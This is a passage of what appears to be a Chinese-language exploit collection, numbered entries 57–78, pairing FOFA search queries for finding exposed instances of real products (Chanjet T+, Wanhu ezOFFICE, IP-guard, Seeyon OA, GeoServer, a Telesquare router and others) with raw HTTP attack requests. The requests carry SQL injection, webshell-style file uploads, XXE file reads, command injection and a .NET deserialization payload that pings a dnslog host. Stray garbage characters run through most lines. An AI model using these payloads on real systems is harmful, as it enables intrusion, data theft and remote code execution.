User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
. Y, C5 c/ U" J4 h2 zContent-Type: application/json
$ |9 t. a X) d5 X/ `6 U" \* t+ X- u) m: W) X: Y( c
{7 q. \" [. J4 a9 v) |, q( r3 O
"storeID":{4 j: b& k6 L" V
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",1 _+ C) j8 {8 ~. M( ~* n% j
"MethodName":"Start",
' G; r6 ~, t* c: `' {9 O "ObjectInstance":{
3 @! f4 F/ k0 z8 }2 i: R* a "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",2 y0 c0 A, R2 V, l! l, C4 a
"StartInfo": {, i% ]# X0 T# y, ~! {0 x0 m
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
6 C: D. e4 D1 _" X; h4 ^ "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
, ?& z0 h; l& x( j. W }
" a) Z; E4 z, Y+ @! o2 J& u }
4 S; J6 \% m1 W+ v R* D }, H9 N! J6 z4 j( }+ |) h
}4 r% N# _0 R" Z' O
* _1 c0 z4 g/ t# V
b9 S$ S" q4 u4 J& F, e- G. b
57. 畅捷通T+ keyEdit.aspx SQL注入! ?- L" u' ~- Z" |
FOFA:app="畅捷通-TPlus"; V8 V. o% ~; O& O
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1( B' A* a" c3 i3 a. v! n8 I% |4 V1 ]* C
Host: host
3 h" N4 p) F. QUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
2 q- l; u0 c7 ^( U7 nAccept-Charset: utf-8 e: `9 v$ l+ w/ j
Accept-Encoding: gzip, deflate# F4 e* E) T) W: X
Connection: close8 d+ M5 [% P# I% s( v, b
4 |: {2 q: E3 }8 l: u
7 I8 B8 r7 T7 d" }/ |+ ?7 _58. 畅捷通T+ KeyInfoList.aspx sql注入
8 O& ]1 S5 L- S0 ^0 DFOFA:app="畅捷通-TPlus"
% S, m+ o% v, b' m C2 L0 |GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1! l4 U1 ?$ f. y0 `( ^$ W A. X: `
Host: your-ip
7 Q/ Q3 G% u: |! \4 V: C* E$ a" tUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36% k- \# [7 c, P H [% B
Accept-Charset: utf-8
! v4 f; x" V, t! B- U- ]5 wAccept-Encoding: gzip, deflate: t) I6 [0 R- Z+ m) t" u
Connection: close% j. ?" L i7 a) r6 I
. a1 u9 l, ]. n: w6 C) |1 }( D
+ [; c+ W- b0 M$ U! A! N! N- G59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行 p0 b) @9 ]; L0 ]% z; F! ]5 C" U1 Z
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd" l Z$ q2 ~* F8 t5 O) d6 d
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
* |7 ?) C9 E* a# e' K k F4 l/ V8 NHost: 192.168.86.128:9090/ u* q; ^( x6 O$ r
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
; { H* r7 C# D4 E: DConnection: close% f( ~; \5 w* T9 `! |3 J
Content-Length: 1669! c3 ~# G- ?+ Q) Z3 }8 O" e" ^
Accept: */*- A" j8 r6 _# t3 V, X/ [( P) t
Accept-Language: en4 M9 ^3 R) _: k0 `, q
Content-Type: application/x-www-form-urlencoded" U: M8 ~6 ?1 V* R
Accept-Encoding: gzip
4 W6 Q. R4 a4 W2 M% C i
8 T- C! {2 t% \- ePAYLOAD
8 b O& w- j) q- R: L! U+ z3 o6 Q) W: b" x
# A- b, p6 `% A, L: }) V- K60. 百卓Smart管理平台 importexport.php SQL注入$ B$ I. N- k, C6 K6 F5 D
FOFA:title="Smart管理平台"% A, ^2 n3 {( A" y0 \- `
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
( Z( A& b9 u# N% n9 IHost:. u$ F9 g$ K" j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36( Z$ t' ^, m/ [4 E; x! N1 d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 V5 h* E: p b# M: M0 n. [$ Z
Accept-Encoding: gzip, deflate1 {- O5 {+ m* F) ?5 I5 V6 W% h
Accept-Language: zh-CN,zh;q=0.9& w4 P5 n2 B$ h9 n8 k
Connection: close/ b6 c0 k+ @7 s; T* h7 p6 J7 k
. {" H Q4 ^! ~' N
& G# Q1 w$ p \* u% j F! w61. 浙大恩特客户资源管理系统 fileupload 任意文件上传( _+ Z* d3 ^0 q8 c- G+ c
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
5 D7 }1 Q) [9 a; e( k* t: E( mPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1+ k3 {- v. R5 W' ~( F: k
Host: x.x.x.x) B4 B Y, Q$ A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) Z- `) w. y: f7 p X
Connection: close1 c/ I8 U9 j! v7 c' |( i
Content-Length: 27# D' J" F$ d4 c- {' [$ N G; R
Accept: */*# T- H# P; E# Q. o6 C0 H/ @
Accept-Encoding: gzip, deflate
% C5 v8 ~$ i z+ j& D bAccept-Language: en! u9 n5 \6 v7 X4 p
Content-Type: application/x-www-form-urlencoded
' Z) l$ U* \2 D/ d
' M+ ]9 ]7 V$ G- I. {. `8uxssX66eqrqtKObcVa0kid98xa
) U9 ^ ~! K8 f- G5 U3 c4 ]4 z0 O9 b$ m0 e. H0 o
6 }, f& w$ | s, `+ X62. IP-guard WebServer 远程命令执行- l+ x( R. v% _" P
FOFA:"IP-guard" && icon_hash="2030860561"2 n5 J1 x$ r; a( f$ V# e" Q
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
2 P5 X( y5 |% ~' uHost: x.x.x.x `1 H& c( I7 z! b. {# x9 u1 o
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
, Q$ N/ l& Z6 p6 Q' fConnection: close
- a* u; U3 d. E) o8 CAccept: */*
1 ? A0 S. {6 h7 IAccept-Language: en
* w+ L# b- Y2 o7 w9 n8 gAccept-Encoding: gzip1 p: i ~# k% a4 _) A; y
- `$ ]# @' l/ b* r3 f5 F' ~% l
( y& ]# ?4 q* j, ~) v访问
# B4 v. R' q0 H+ c. P$ l
+ ^1 }( T& @/ G4 F6 JGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.17 j* v! O! q- y/ D
Host: x.x.x.x3 D" F( E+ _& M; _
* ~" g- K/ E0 K5 B4 q5 _
6 M) H2 Y2 j" R! ^: H! F# _. K63. IP-guard WebServer任意文件读取
" Q1 G9 {5 Z0 n; Q7 MIP-guard < 4.82.0609.0
- J% P9 R- j D- Q lFOFA:icon_hash="2030860561"
$ M9 Z. w: _# ~' HPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1) o, O+ \" N- [: o! u q0 M" n
Host: your-ip
) h8 ^( E! a1 U/ P/ a7 C$ _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
0 s) g5 R% q" e8 R8 p8 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' ]: D- @3 ?/ p" G9 J
Accept-Encoding: gzip, deflate, @' A1 _/ e8 i9 K& |4 {
Accept-Language: zh-CN,zh;q=0.9
3 J& _& p Y7 lConnection: close
o, L' b$ s8 m6 ]Content-Type: application/x-www-form-urlencoded. w7 N; Z5 J" r# l# a: @* N9 n
- e; k {8 _& p5 ppath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
, U& Q" b+ U Z* q. N: a1 I1 p. i: P8 D+ i* a) y" t
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
+ b; x' ~/ k5 r7 i: J- ^* ZFOFA:body="/Scripts/EnjoyMsg.js": z6 \* s/ u; g7 E9 a
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
( ~1 l$ y, h; ~( GHost: 192.168.86.128:9001$ [7 A8 T) p# I7 R+ P4 l& Y
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
# }! S% C! _" e( C2 OConnection: close
9 s" _- l! x' h& |! bContent-Length: 369
7 s5 G+ M3 D$ Y, ?* TAccept: */*
1 j* `" ?# ?* ^) i! ?2 X/ \Accept-Language: en
( c! c& \2 x5 L) V4 b+ a+ XContent-Type: text/xml; charset=utf-8
) ^* L5 b; }- s7 U3 V( NAccept-Encoding: gzip" P' ^ @# d0 {/ c! B' n- @, _% u
" \) G R- _" I% I6 C3 J1 h
<?xml version="1.0" encoding="utf-8"?>
8 R& }3 [8 A4 s# |! D. {# T$ K5 K<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
8 Y% a3 j) \) |% @8 c3 A- i<soap:Body>
8 A+ _2 w" `2 y( F <GetOSpById xmlns="http://tempuri.org/">
$ H% K$ z+ |1 |& c- _4 b <sId>1';waitfor delay '0:0:5'--+</sId>: t% C# @. _ n- @7 B2 F
</GetOSpById>
) K/ h9 Q& b3 g- l) I' V4 X </soap:Body>
: \( s$ i5 \* O! \& J! ~</soap:Envelope>
7 b2 G) C% x! S2 B/ I
- H$ f% q2 n% j; s9 d! J2 C- r( c
! n/ M: |' ~5 L% Z" z! e% [6 d65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过* h9 _2 h# I# Z4 ]! K" I/ }
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
8 r$ Y5 n" l/ p. \8 |+ e响应200即成功创建账号test123456/123456$ {: f- F! ^0 D* T) R! R3 i1 `
POST /SystemMng.ashx HTTP/1.1 x! A7 r) Y7 u" ?
Host:/ B7 _& I4 T5 A8 k9 \: F/ o
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
, x; f" C% D* \8 KAccept-Encoding: gzip, deflate
# I4 |3 ^6 r0 o, eAccept: */*
$ S9 N+ w$ k8 t$ c5 ^Connection: close x7 _7 e8 l& D& b4 }* X5 P: A
Accept-Language: en: @$ @6 a4 N" `8 X8 y4 A C+ e2 k
Content-Length: 1743 U3 A3 I& y; t$ y
H/ X p1 G, N% j' PoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators, n0 c+ l+ H& n: T) ^+ h6 V
, S, }; f+ P L
. x0 k3 B' D1 c1 t1 D& c66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
& } D6 l: e" v# ~6 h: B7 ]- \FOFA:app="万户ezOFFICE协同管理平台"
. F i/ b$ q* n# R/ Q+ b* C4 o2 j$ Z* v5 E/ o m
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
t9 W. L0 Y! AHost: x.x.x.x4 y! q- M, R+ M: a9 i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36: W6 K9 V. L8 t' T( a8 E
Connection: close, B& O9 `) J, A( X# V
Accept: */*
% {, q& o+ j' s* zAccept-Language: en$ K$ s* G- _$ G& Y& D9 N
Accept-Encoding: gzip6 l! A) U- B1 f/ y& A) Z& x$ J
- y: B) Z* w0 r! _& _
}! f$ a. {% i. K" b |2 ~第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在$ J; f: v. J/ U( ]4 D' F
* @- ]0 V% ?( n
67. 万户ezOFFICE wpsservlet任意文件上传5 X M1 J' Z5 u
FOFA:app="万户网络-ezOFFICE"
$ K1 a/ j3 I1 InewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型/ \# @) V# j2 W) k! @% W# V/ d
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
( e: K2 }+ h* _$ W* nHost: x.x.x.x
$ D0 m6 ?- V: s7 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
$ G" s0 M- X/ m, R( W: xContent-Length: 173+ L, \% V. `% l8 m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
$ Y: `+ H1 m" d) v fAccept-Encoding: gzip, deflate. v2 M5 `% k* z* E
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
9 g0 _' W1 \! ?Connection: close: T2 J! K1 t& i! L$ n. Q6 l+ Y" t" R
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
' W- f$ c# k9 Z4 K8 _9 _DNT: 1- u* L7 p( t! y/ X( ^9 U8 N* g
Upgrade-Insecure-Requests: 1
& f" E6 G8 k! Z7 W* t8 a' `; ]+ J
--ufuadpxathqvxfqnuyuqaozvseiueerp
7 ]5 u' F# B2 _, g2 y: mContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"% |7 z6 Y6 o q, Z. S' b& J/ c
" f0 E# q# Y* M
<% out.print("sasdfghjkj");%>4 V" W! g# Z) Z- P* Z( ?
--ufuadpxathqvxfqnuyuqaozvseiueerp--$ e4 ]2 E7 }' @3 i' @% M* _$ @; k e
+ Z8 `, z3 F' e9 z' _4 t' f- b
9 S6 b$ q+ P% O, s文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
h' X- y: f& U7 R
$ ]5 u0 h) o* h& _68. 万户ezOFFICE wf_printnum.jsp SQL注入
+ v0 h% A# `& U1 G5 B( }: jFOFA:app="万户ezOFFICE协同管理平台"0 S2 s6 ^$ J5 Q( i6 m: E5 t
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
+ f. e7 D6 S }- ~Host: {{host}}
- f' V2 A2 f, e5 a) u8 }/ LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36 ?- ^4 K/ Q3 V
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8* h: _( m& W m
Accept-Encoding: gzip, deflate
1 x) Z$ j. C1 E+ R' T1 hAccept-Language: zh-CN,zh;q=0.9
: |& F9 y% C" \; V% n2 yConnection: close
' |$ i' H9 e3 _) F$ v, l1 g8 a9 Q
1 d, {: W7 I5 p8 }% I, Z, k; ^- v
69. 万户 ezOFFICE contract_gd.jsp SQL注入
5 N6 c, h& P5 nFOFA:app="万户ezOFFICE协同管理平台"7 ^( T3 A; C5 r( S$ {) m+ j
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
+ Z. G; I& d* `8 v: X+ iHost: your-ip! c% v& G4 i! A. m9 _" ]
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36; m! x; J2 f8 G6 O4 s
Accept-Encoding: gzip, deflate
5 F$ X! @6 z$ L8 c1 ^Accept: */*" w% ], X( o; f5 @" Y
Connection: keep-alive! D: Y5 N9 B9 V& ^% p1 n" g& D
9 N$ [$ {$ r$ K: t
3 J- w0 |3 G* x" i S9 s( x70. 万户ezEIP success 命令执行
6 H% ]3 i6 i0 [FOFA:app="万户网络-ezEIP"
6 o3 ^7 s6 g3 ~+ O2 hPOST /member/success.aspx HTTP/1.16 a j7 l8 m6 ? C7 `
Host: {{Hostname}}, j. P- J0 R* R$ _! q3 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36' b, Q0 Z6 K: p; L
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=! S. G- u& q# l6 y( c4 V
Content-Type: application/x-www-form-urlencoded% E. }: `" t& \0 E
TYPE: C' j F, n4 C" F5 _) e
Content-Length: 167020 i! _8 I9 f& c3 N2 } M' k
o9 F u; ]( l! E* x) [__VIEWSTATE=PAYLOAD' y$ `" u0 v' Z# R# u' y
* i/ G5 N& d- [4 V5 \
; ~# r! s" d5 s
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入" W, J: s3 z, f# s0 } p
FOFA:body="PM2项目管理系统BS版增强工具.zip"
' W, T2 C. k3 Q" Z3 @GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1' `" w1 O$ [: n6 h; }
Host: x.x.x.xx.x.x.x
; g& A) G2 y. V/ n1 W7 ?! g bUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
2 L( a$ v8 L( ?( r! U( l; U( WConnection: close
( Z2 v' l3 g) C0 N4 T* `! nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ @1 w; c; p8 H8 V( [ L Y
Accept-Encoding: gzip, deflate
7 w7 K( R) d) u! }% pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
A$ J* A1 n M( Q. L- B# iUpgrade-Insecure-Requests: 1: u u0 X6 `* ]
8 ~& g) I0 ?- m6 o" k O9 x; ` k8 I
72. 致远OA getAjaxDataServlet XXE$ J- b" i& E7 W5 S+ Y3 E
FOFA:app="致远互联-OA"
* a8 r) z6 p8 l0 c; hPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
; V# m1 \+ ~+ p# z. e- j% D4 A, K# o& KHost: 192.168.40.131:8099, R) R& F+ | L. n% r v
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.366 {7 _! f& Y9 Z6 Q8 ]: u; e
Connection: close, P- b, N2 e& B }2 |+ W$ x
Content-Length: 583
5 E, I# W' y5 q0 C& [Content-Type: application/x-www-form-urlencoded
2 p$ g) p# o5 d3 UAccept-Encoding: gzip4 O" X i5 X/ N( Q/ `
7 T- L( ~ H. c9 n; N( f
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E3 @2 C8 u( Z/ n: V
3 c c2 g7 O6 G- P7 g& t
8 k' ]4 s) Z8 r1 p1 j2 r73. GeoServer wms远程代码执行
! p9 h+ ]% Y F; n( \FOFA:icon_hash=”97540678”
* E% d& y4 _; Y! K+ dPOST /geoserver/wms HTTP/1.1# r4 k3 A a6 F9 I
Host:
) z! t% V. i2 J9 I& iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36; I* _" P! y& z! F$ I) F
Content-Length: 19815 Z; O4 p: k! [8 T2 y* |
Accept-Encoding: gzip, deflate
* s! u, T& R) P' wConnection: close7 ] a& n' q1 A S
Content-Type: application/xml
! L; x) y- Y: E, A/ k2 A5 WSL-CE-SUID: 3* @ e! Q2 @7 B+ v, f0 S3 W& u
. P1 g0 s& j2 I+ [. n
PAYLOAD
: d$ q _8 e' Z1 L: S. R
( [& T! [, \' M3 d
3 H2 J1 m4 p$ S9 ~2 L: b74. 致远M3-server 6_1sp1 反序列化RCE
' D1 p6 E$ d: E. Z+ R6 w9 S/ WFOFA:title="M3-Server"' S" |- o3 c9 c# Y9 @. K4 k1 k: q
PAYLOAD) ~# m0 A# N' p$ M
* R5 l* O1 w4 ?
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE( K. N, P6 Q1 `; A
FOFA:app="TELESQUARE-TLR-2005KSH"9 [: w1 n/ M7 O' O4 [# T4 Y
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
! Q( m1 A3 y4 c( |: e; T8 D7 QHost: x.x.x.x
% i3 h1 Y2 L3 s# I0 {4 c2 N1 a( uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 X. c: |4 F! n% b% t4 {( C) OConnection: close5 I! N1 N; r$ w% \4 \
Accept: */*
! @' R& S$ m! L9 h# A. IAccept-Language: en4 |$ e4 O8 Y* c! C% ^7 h
Accept-Encoding: gzip
# h2 R. o4 V7 o5 K
) A7 g/ v0 i1 m! a% o
$ @' H0 E" K' S2 YGET /cgi-bin/test28256.txt HTTP/1.1
: \- h, a$ m' Z' z8 r- aHost: x.x.x.x( {/ t, h ?) p1 P& @4 L3 t
' g! o }, V$ `6 c- I+ H- I
$ Y6 i4 Q! Q2 v$ E! o q76. 新开普掌上校园服务管理平台service.action远程命令执行' h6 z, p( B: C! K! d; _+ d
FOFA:title="掌上校园服务管理平台"
* Y) s I2 C8 k) |. N) e: GPOST /service_transport/service.action HTTP/1.14 {) U$ H4 T0 B- a- e+ M2 }
Host: x.x.x.x
& A3 V0 T. G9 } ` d1 k/ Z4 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0: S0 X0 _: {, q
Connection: close
8 T) ?9 L0 F! H! o* ZContent-Length: 211$ o: g3 r" Y- c, o7 P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ g7 Q+ ]$ b: F6 F5 QAccept-Encoding: gzip, deflate8 S3 C1 g' s/ o) x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; q& _! ?9 Z( g, z% u3 ?/ |
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
( y( a- ^* h8 j1 U' mUpgrade-Insecure-Requests: 1
9 _+ Q( i3 N. @: `; K! ~
! ?! q* {: Z& l' Q{. F, F! m! u" c6 D; a3 L$ o% X. Z
"command": "GetFZinfo",
8 {/ ?) D" j5 E f "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"9 l7 B" m& r3 Q6 e
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"5 @8 R* J/ C. V: S% G% Z7 a
}1 ?6 i2 w$ b. H7 c9 }
: p. h7 y5 Z# [
2 N; v% p' ^3 N; R7 I' X& U6 iGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
. {/ a) c/ C r% p* J; J) J% WHost: x.x.x.x3 r$ a& F2 {' t. F
" k q8 q. S" |9 p
( m5 l+ ?4 L# B. H( [2 ^: [& L
$ M1 ]* _, @) S* ~
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
# O% n: ?) K1 P7 GFOFA:body="F22WEB登陆"1 a4 f6 J; ], t0 j! ^8 u% w
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
! @1 I! F Q7 b4 {( O& j! ]; iHost: x.x.x.x0 M; q, C3 q2 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
) C) \9 k) m8 ]/ N6 MConnection: close
, j9 f; ~0 e! i) \7 \( RContent-Length: 4337 m4 x l" L z
Accept: */*: M! E. a9 O. w! p
Accept-Encoding: gzip, deflate
% r/ S' v) m4 R2 H5 w" }( g/ HAccept-Language: zh-CN,zh;q=0.98 T! k1 L" P: ]
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix' q5 V! ^* J* D5 D: l
& s1 I: |3 n: ~% f& R1 w) p------------398jnjVTTlDVXHlE7yYnfwBoix# @8 T6 M5 q7 p8 `4 }* F- B
Content-Disposition: form-data; name="folder"
0 T; v; o/ T5 K3 S- _4 U
/ T- T0 P( P& w* a. d3 ?; {/upload/udplog
0 s h0 `+ W6 A, e. \$ i------------398jnjVTTlDVXHlE7yYnfwBoix
* J& X8 g3 g% i6 U9 ?* b; mContent-Disposition: form-data; name="Filedata"; filename="1.aspx"" |( Z) C8 S+ K O
Content-Type: application/octet-stream
" {3 n- R* ?/ v, C0 q6 H- d+ o
# z1 M: {5 \# y, I1 Bhello1234567
* b7 t I) f! T: y3 n. B6 P0 v- x------------398jnjVTTlDVXHlE7yYnfwBoix- g# X4 w+ ^ G6 Y7 d
Content-Disposition: form-data; name="Upload"( \ k c( H9 a& s& g0 h& J
1 y I& c; U; M5 h/ Z
Submit Query
4 R2 f4 {; S! }------------398jnjVTTlDVXHlE7yYnfwBoix--
# l; P" G( l( o3 N' u
1 E8 C9 [ r X3 L
5 u8 S: H* H" Q6 L- n# [ R78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
7 y" ]* u. g0 m/ PFOFA:icon_hash="2001627082"
3 y" T% u, a- R f, y# X; DPOST /Platform/System/FileUpload.ashx HTTP/1.1
! h4 \2 U* p# m2 R' i0 h' S# S0 vHost: x.x.x.x
! v5 y# k, y6 s6 D# eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 h0 D$ C! Y+ RConnection: close
, N. N) q8 l. EContent-Length: 3363 D, ?! M0 P) Z2 ?; { m; v
Accept-Encoding: gzip
3 N8 T6 a" B8 V. R- P0 a% U8 xContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l/ N* ` q3 |! M% C
/ o4 z. ~0 C* t( h, n4 p------YsOxWxSvj1KyZow1PTsh98fdu6l6 n9 R% y% a; b4 p# Q
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"9 \% C2 n& L' v2 C) u
Content-Type: image/png% ?$ i: B; [4 e: f8 u
4 y4 m- `! {: R. l! VYsOxWxSvj1KyZow1PTsh98fdu6l
4 N+ e. _+ g( e" _------YsOxWxSvj1KyZow1PTsh98fdu6l
& B' O5 I ^ ]/ v+ ^+ s: `Content-Disposition: form-data; name="target"; H4 j' t* _3 [3 D
# q3 L$ U5 {5 \$ e" O3 O7 ~/Applications/SkillDevelopAndEHS/
/ b) v4 z. U4 [( Q/ J. H. S% b------YsOxWxSvj1KyZow1PTsh98fdu6l--
9 {* P0 D1 w. [6 B0 }9 g) _6 l4 V/ \# [0 L
